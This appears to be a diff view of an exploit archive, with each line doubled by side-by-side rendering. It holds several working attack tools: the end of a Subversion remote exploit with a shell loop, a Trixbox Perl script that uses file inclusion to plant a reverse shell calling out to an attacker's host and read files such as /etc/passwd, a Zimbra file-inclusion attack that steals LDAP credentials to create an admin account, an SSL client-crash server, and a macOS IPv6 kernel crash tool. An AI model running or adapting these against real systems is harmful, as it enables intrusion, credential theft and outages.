if(!strcmp(bfr,"http")) if(!strcmp(bfr,"http"))
*proto=HTTP, *port=80; *proto=HTTP, *port=80;
else if(!strcmp(bfr,"svn")) else if(!strcmp(bfr,"svn"))
*proto=SVN, *port=3690; *proto=SVN, *port=3690;
else else
{ {
printf("Unsupported protocol %s\n",bfr); printf("Unsupported protocol %s\n",bfr);
return -1; return -1;
} }
uri=ptr+3; uri=ptr+3;
if((ptr=strchr(uri,':'))) if((ptr=strchr(uri,':')))
{ {
*ptr=0; *ptr=0;
snprintf(host,1000,"%s",uri); snprintf(host,1000,"%s",uri);
uri=ptr+1; uri=ptr+1;
if((ptr=strchr(uri,'/'))==NULL) return -1; if((ptr=strchr(uri,'/'))==NULL) return -1;
*ptr=0; *ptr=0;
snprintf(bfr,1000,"%s",uri); snprintf(bfr,1000,"%s",uri);
*port=(int)strtol(bfr,NULL,10); *port=(int)strtol(bfr,NULL,10);
*ptr='/'; *ptr='/';
uri=ptr; uri=ptr;
} }
else if((ptr=strchr(uri,'/'))) else if((ptr=strchr(uri,'/')))
{ {
*ptr=0; *ptr=0;
snprintf(host,1000,"%s",uri); snprintf(host,1000,"%s",uri);
*ptr='/'; *ptr='/';
uri=ptr; uri=ptr;
} }
snprintf(repos,1000,"%s",uri); snprintf(repos,1000,"%s",uri);
return 0; return 0;
} }
int exec_sh(int sockfd) int exec_sh(int sockfd)
{ {
char snd[4096],rcv[4096]; char snd[4096],rcv[4096];
fd_set rset; fd_set rset;
while(1) while(1)
{ {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset); FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset); FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL); select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset)) if(FD_ISSET(fileno(stdin),&rset))
{ {
memset(snd,0,sizeof(snd)); memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin); fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd)); write(sockfd,snd,strlen(snd));
} }
if(FD_ISSET(sockfd,&rset)) if(FD_ISSET(sockfd,&rset))
{ {
memset(rcv,0,sizeof(rcv)); memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0) if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0); exit(0);
fputs(rcv,stdout); fputs(rcv,stdout);
} }
} }
} }
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sock, port; int sock, port;
size_t size; size_t size;
char cmd[1000], reply[1000], buffer[1000]; char cmd[1000], reply[1000], buffer[1000];
char svdcmdline[1000]; char svdcmdline[1000];
char host[1000], repos[1000], *ptr, *caddr; char host[1000], repos[1000], *ptr, *caddr;
unsigned long addr; unsigned long addr;
struct sockaddr_in sin; struct sockaddr_in sin;
struct hostent *he; struct hostent *he;
enum protocol proto; enum protocol proto;
/*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666); /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
write(sock,stage1loader,strlen(stage1loader)); write(sock,stage1loader,strlen(stage1loader));
close(sock); close(sock);
return 0;*/ return 0;*/
printf("hoagie_subversion - remote exploit against subversion servers\n" printf("hoagie_subversion - remote exploit against subversion servers\n"
"by greuff@void.at\n\n"); "by greuff@void.at\n\n");
if(argc!=3) if(argc!=3)
{ {
printf("Usage: %s serverurl offset\n\n",argv[0]); printf("Usage: %s serverurl offset\n\n",argv[0]);
printf("Examples:\n" printf("Examples:\n"
" %s svn://localhost/repository 0x41414141\n" " %s svn://localhost/repository 0x41414141\n"
" %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]); " %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
printf("The offset is an alphanumeric address (or UTF-8 to be\n" printf("The offset is an alphanumeric address (or UTF-8 to be\n"
"more precise) of a pop instruction, followed by a ret.\n" "more precise) of a pop instruction, followed by a ret.\n"
"Brute force when in doubt.\n\n"); "Brute force when in doubt.\n\n");
printf("When exploiting against an svn://-url, you can supply a\n" printf("When exploiting against an svn://-url, you can supply a\n"
"binary offset too.\n\n"); "binary offset too.\n\n");
exit(1); exit(1);
} }
// parse the URI // parse the URI
snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]); snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
if(parse_uri(argv[1],&proto,host,&port,repos)<0) if(parse_uri(argv[1],&proto,host,&port,repos)<0)
{ {
printf("URI parse error\n"); printf("URI parse error\n");
exit(1); exit(1);
} }
printf("parse_uri result:\n" printf("parse_uri result:\n"
"Protocol: %d\n" "Protocol: %d\n"
"Host: %s\n" "Host: %s\n"
"Port: %d\n" "Port: %d\n"
"Repository: %s\n\n",proto,host,port,repos); "Repository: %s\n\n",proto,host,port,repos);
addr=strtoul(argv[2],NULL,16); addr=strtoul(argv[2],NULL,16);
caddr=(char *)&addr; caddr=(char *)&addr;
printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]); printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);
sock=socket(AF_INET,SOCK_STREAM,0); sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0) if(sock<0)
{ {
perror("socket"); perror("socket");
return -1; return -1;
} }
he=gethostbyname(host); he=gethostbyname(host);
if(he==NULL) if(he==NULL)
{ {
herror("gethostbyname"); herror("gethostbyname");
return -1; return -1;
} }
sin.sin_family=AF_INET; sin.sin_family=AF_INET;
sin.sin_port=htons(port); sin.sin_port=htons(port);
memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr)); memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{ {
perror("connect"); perror("connect");
return -1; return -1;
} }
if(proto==SVN) if(proto==SVN)
{ {
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline); snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
strcpy(cmd,"( ANONYMOUS ( 0: ) ) "); strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader, snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]); caddr[0],caddr[1],caddr[2],caddr[3]);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
size=read(sock,reply,sizeof(reply)); size=read(sock,reply,sizeof(reply));
reply[size]=0; reply[size]=0;
printf("Server said: %s\n",reply); printf("Server said: %s\n",reply);
} }
else if(proto==HTTP) else if(proto==HTTP)
{ {
// preparing the request... // preparing the request...
snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader, snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
caddr[0],caddr[1],caddr[2],caddr[3]); caddr[0],caddr[1],caddr[2],caddr[3]);
size=strlen(buffer); size=strlen(buffer);
snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer); snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);
// now sending the request, immediately followed by the 2nd stage loader // now sending the request, immediately followed by the 2nd stage loader
printf("Sending:\n%s",cmd); printf("Sending:\n%s",cmd);
write(sock,cmd,strlen(cmd)); write(sock,cmd,strlen(cmd));
sleep(1); sleep(1);
write(sock,stage2loader,stage2loaderlen); write(sock,stage2loader,stage2loaderlen);
} }
// SHELL LOOP // SHELL LOOP
printf("Entering shell loop...\n"); printf("Entering shell loop...\n");
exec_sh(sock); exec_sh(sock);
/*sleep(1); /*sleep(1);
close(sock); close(sock);
printf("\nConnecting to the shell...\n"); printf("\nConnecting to the shell...\n");
exec_sh(connect_sh()); */ exec_sh(connect_sh()); */
return 0; return 0;
} }
// milw0rm.com [2005-05-03] // milw0rm.com [2005-05-03]

268
platforms/linux/remote/6026.pl
View file

@ -1,134 +1,134 @@
#!/usr/bin/perl -w #!/usr/bin/perl -w
# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit # Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit
# 2008-07-09 # 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo. # This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
# #
# perl trixbox_fi_v2.pl 192.168.1.212 # perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed # Please listen carefully as our menu option has changed
# Choose from the following options: # Choose from the following options:
# 1> Remote TCP shell # 1> Remote TCP shell
# 2> Read local file # 2> Read local file
# 1 # 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444 # Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk] # Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root # root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444) # Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue... # Press enter to continue...
# done... # done...
# nc -l -v -p 4444 # nc -l -v -p 4444
# listening on [any] 4444 ... # listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397 # connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell # bash: no job control in this shell
# bash-3.1# id # bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# bash-3.1# # bash-3.1#
use strict; use strict;
use Switch; use Switch;
use LWP::UserAgent; use LWP::UserAgent;
use HTTP::Cookies; use HTTP::Cookies;
usage() unless @ARGV; usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php"; my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new; my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new; my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar); $ua->cookie_jar($cookie_jar);
menu(); menu();
sub execScript{ sub execScript{
my $scriptCode = shift; my $scriptCode = shift;
post($scriptCode); post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string); my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
} }
sub post{ sub post{
my $postData = shift; my $postData = shift;
my $req = HTTP::Request->new(POST => $url); my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded'); $req->content_type('application/x-www-form-urlencoded');
$req->content($postData); $req->content($postData);
my $res = $ua->request($req); my $res = $ua->request($req);
my $content = $res->content; my $content = $res->content;
return $content; return $content;
} }
sub readFile{ sub readFile{
my $file = shift; my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00"); my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content); my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n"; my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){ for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/); last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n"; $fileContent = $fileContent . $fileLines[$i-3] . "\n";
} }
return $fileContent; return $fileContent;
} }
sub tcp_reverse_shell{ sub tcp_reverse_shell{
my $rhost= shift; my $rhost= shift;
my $rport = shift; my $rport = shift;
my $uid = shift; my $uid = shift;
my $rshell; my $rshell;
if($uid eq "asterisk"){ if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00"; $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{ }else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00"; $rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
} }
execScript($rshell); execScript($rshell);
} }
sub extractPHPSID{ sub extractPHPSID{
$_ = shift; $_ = shift;
if(/PHPSESSID=(\w+)/){ if(/PHPSESSID=(\w+)/){
return $1; return $1;
} }
} }
sub menu{ sub menu{
print <<EOF; print <<EOF;
Please listen carefully as our menu option has changed Please listen carefully as our menu option has changed
Choose from the following options: Choose from the following options:
1> Remote TCP shell 1> Remote TCP shell
2> Read local file 2> Read local file
EOF EOF
my $option = <STDIN>; my $option = <STDIN>;
chop($option); chop($option);
switch($option){ switch($option){
case 1 { case 1 {
print "Host and port the reverse shell should connect to ? "; print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): "; print "(<host>:<port>): ";
my $hp=<STDIN>; my $hp=<STDIN>;
chop($hp); chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]"; print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>; my $uid=<STDIN>;
chop($uid); chop($uid);
my($rhost,$rport) = split(/:/,$hp); my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n"; print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue..."; print "Press enter to continue...";
<STDIN>; <STDIN>;
tcp_reverse_shell($rhost,$rport,$uid); tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n"; print "done...\n";
} }
case 2 { case 2 {
while(1){ while(1){
print "Full path (e.g. /etc/passwd): "; print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>; my $file = <STDIN>;
chop($file); chop($file);
print readFile($file) . "\n\n"; print readFile($file) . "\n\n";
} }
} }
} }
} }
sub usage{ sub usage{
print "./trixbox_fi.pl <host>\n"; print "./trixbox_fi.pl <host>\n";
exit 1; exit 1;
} }
# milw0rm.com [2008-07-09] # milw0rm.com [2008-07-09]

6
platforms/linux/remote/764.c
View file

@ -1289,6 +1289,6 @@ int main(int argc, char* argv[])
close(ssl1->sock); close(ssl1->sock);
return 0; return 0;
} }
/* spabam: It isn't 0day */ /* spabam: It isn't 0day */
// milw0rm.com [2003-04-04] // milw0rm.com [2003-04-04]

59
platforms/linux/webapps/30085.txt Executable file
View file

@ -0,0 +1,59 @@
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
The number of servers vuln are huge like 80/100.
This is only for educational purpouses.

110
platforms/multiple/dos/4773.pl
View file

@ -1,55 +1,55 @@
#!/usr/bin/perl #!/usr/bin/perl
# Copyright(c) Beyond Security # Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module # Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response # Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response
use strict; use strict;
use IO::Socket; use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, ); my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock; die "Could not create socket: $!\n" unless $sock;
my $TIMEOUT = 0.5; my $TIMEOUT = 0.5;
my $line; my $line;
my $new_sock; my $new_sock;
srand(time()); srand(time());
while ( $new_sock = $sock->accept() ) while ( $new_sock = $sock->accept() )
{ {
printf ("new connection\n"); printf ("new connection\n");
my $rin; my $rin;
my $line; my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef); my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);
my $ciphers = ""; my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers)); my $ciphers_length = pack('n', length($ciphers));
my $certificate = ""; my $certificate = "";
my $certificate_length = pack('n', length($certificate)); my $certificate_length = pack('n', length($certificate));
my $packet_sslv2 = my $packet_sslv2 =
"\x04". "\x04".
"\x01". # Hit (default 0x01) "\x01". # Hit (default 0x01)
"\x00". # No certificate "\x00". # No certificate
"\x00\x02". "\x00\x02".
$certificate_length. $certificate_length.
$ciphers_length. $ciphers_length.
"\x00\x10". "\x00\x10".
# Certificate # Certificate
$certificate. $certificate.
# Done # Done
# Ciphers # Ciphers
$ciphers. $ciphers.
# Done # Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9"; "\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";
my $ssl_length = pack('n', length($packet_sslv2) + 0x8000); my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2; $packet_sslv2 = $ssl_length . $packet_sslv2;
print $new_sock $packet_sslv2; print $new_sock $packet_sslv2;
close($new_sock); close($new_sock);
} }
# milw0rm.com [2007-12-23] # milw0rm.com [2007-12-23]

286
platforms/multiple/dos/5191.c
View file

@ -1,143 +1,143 @@
/* xnu-ipv6-ipcomp.c /* xnu-ipv6-ipcomp.c
* *
* Copyright (c) 2008 by <mu-b@digit-labs.org> * Copyright (c) 2008 by <mu-b@digit-labs.org>
* *
* Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC
* by mu-b - Sun 24 Feb 2008 * by mu-b - Sun 24 Feb 2008
* *
* - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386)
* Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386)
* *
* ipcomp6_input does not verify the success of the first call * ipcomp6_input does not verify the success of the first call
* to m_pulldown (m -> md typo?). * to m_pulldown (m -> md typo?).
* *
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) { * if (!m) {
* -> * ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) { * if (!md) {
* (bsd/netinet6/ipcomp_input.c) * (bsd/netinet6/ipcomp_input.c)
* *
* curiosly the same bug exists in ipcomp4_input, but an explicit * curiosly the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp. * check is made to ensure there is enough space for the struct ipcomp.
* *
* Note: bug independently found by Shoichi Sakane of the KAME project. * Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable) * (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947) * (http://www.kb.cert.org/vuls/id/110947)
* (http://www.securityfocus.com/bid/27642) * (http://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177) * (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
* *
* - Private Source Code -DO NOT DISTRIBUTE - * - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$! * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <arpa/inet.h> #include <arpa/inet.h>
#include <ifaddrs.h> #include <ifaddrs.h>
#include <libnet.h> #include <libnet.h>
#include <string.h> #include <string.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <unistd.h> #include <unistd.h>
#define IPV6_INTERFACE "eth0" #define IPV6_INTERFACE "eth0"
#define IPV6_SRC_OFFSET 8 #define IPV6_SRC_OFFSET 8
#define IPV6_DST_OFFSET 24 #define IPV6_DST_OFFSET 24
#define HAMMER_NUM 8 #define HAMMER_NUM 8
static unsigned char pbuf[] = static unsigned char pbuf[] =
"\x60" "\x60"
"\x00\x00\x00" "\x00\x00\x00"
"\x00\x00" /* plen = 0 */ "\x00\x00" /* plen = 0 */
"\x6c" /* nxt_hdr = IPComp */ "\x6c" /* nxt_hdr = IPComp */
"\x66" "\x66"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static int static int
get_localip (char *if_name, unsigned int *ip6_addr) get_localip (char *if_name, unsigned int *ip6_addr)
{ {
struct ifaddrs *ifa_head; struct ifaddrs *ifa_head;
int result; int result;
result = -1; result = -1;
if (getifaddrs (&ifa_head) == 0) if (getifaddrs (&ifa_head) == 0)
{ {
struct ifaddrs *ifa_cur; struct ifaddrs *ifa_cur;
ifa_cur = ifa_head; ifa_cur = ifa_head;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{ {
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{ {
if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 || if (strcmp (if_name, (char *) ifa_cur->ifa_name) != 0 ||
ifa_cur->ifa_addr->sa_family != AF_INET6 || ifa_cur->ifa_addr->sa_family != AF_INET6 ||
!(ifa_cur->ifa_flags & IFF_UP)) !(ifa_cur->ifa_flags & IFF_UP))
continue; continue;
memcpy (ip6_addr, memcpy (ip6_addr,
&(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr), &(((struct sockaddr_in6 *) ifa_cur->ifa_addr)->sin6_addr),
sizeof (int) * 4); sizeof (int) * 4);
result = 0; result = 0;
break; break;
} }
} }
freeifaddrs (ifa_head); freeifaddrs (ifa_head);
} }
return (result); return (result);
} }
int int
main (int argc, char **argv) main (int argc, char **argv)
{ {
char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128]; char errbuf[LIBNET_ERRBUF_SIZE], ip6_buf[128];
unsigned int i, ip6_addr[4]; unsigned int i, ip6_addr[4];
libnet_t *lnsock; libnet_t *lnsock;
printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n" printf ("Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS PoC\n"
"by: <mu-b@digit-labs.org>\n" "by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 2) if (argc < 2)
{ {
fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]); fprintf (stderr, "Usage: %s <dst ipv6>\n", argv[0]);
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
if (get_localip (IPV6_INTERFACE, if (get_localip (IPV6_INTERFACE,
(unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0) (unsigned int *) &pbuf[IPV6_SRC_OFFSET]) < 0)
{ {
fprintf (stderr, "* get_localip() failed\n"); fprintf (stderr, "* get_localip() failed\n");
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0) if (inet_pton (AF_INET6, argv[1], ip6_addr) <= 0)
{ {
fprintf (stderr, "* inet_pton() failed\n"); fprintf (stderr, "* inet_pton() failed\n");
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr); memcpy (&pbuf[IPV6_DST_OFFSET], ip6_addr, sizeof ip6_addr);
lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf); lnsock = libnet_init (LIBNET_RAW6_ADV, NULL, errbuf);
if (lnsock == NULL) if (lnsock == NULL)
{ {
fprintf (stderr, "* libnet_init() failed: %s\n", errbuf); fprintf (stderr, "* libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE); exit (EXIT_FAILURE);
} }
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf);
printf ("* local ipv6 %s...\n", ip6_buf); printf ("* local ipv6 %s...\n", ip6_buf);
printf ("* attacking %s...", argv[1]); printf ("* attacking %s...", argv[1]);
for (i = 0; i < HAMMER_NUM; i++) for (i = 0; i < HAMMER_NUM; i++)
libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1);
printf ("done\n"); printf ("done\n");
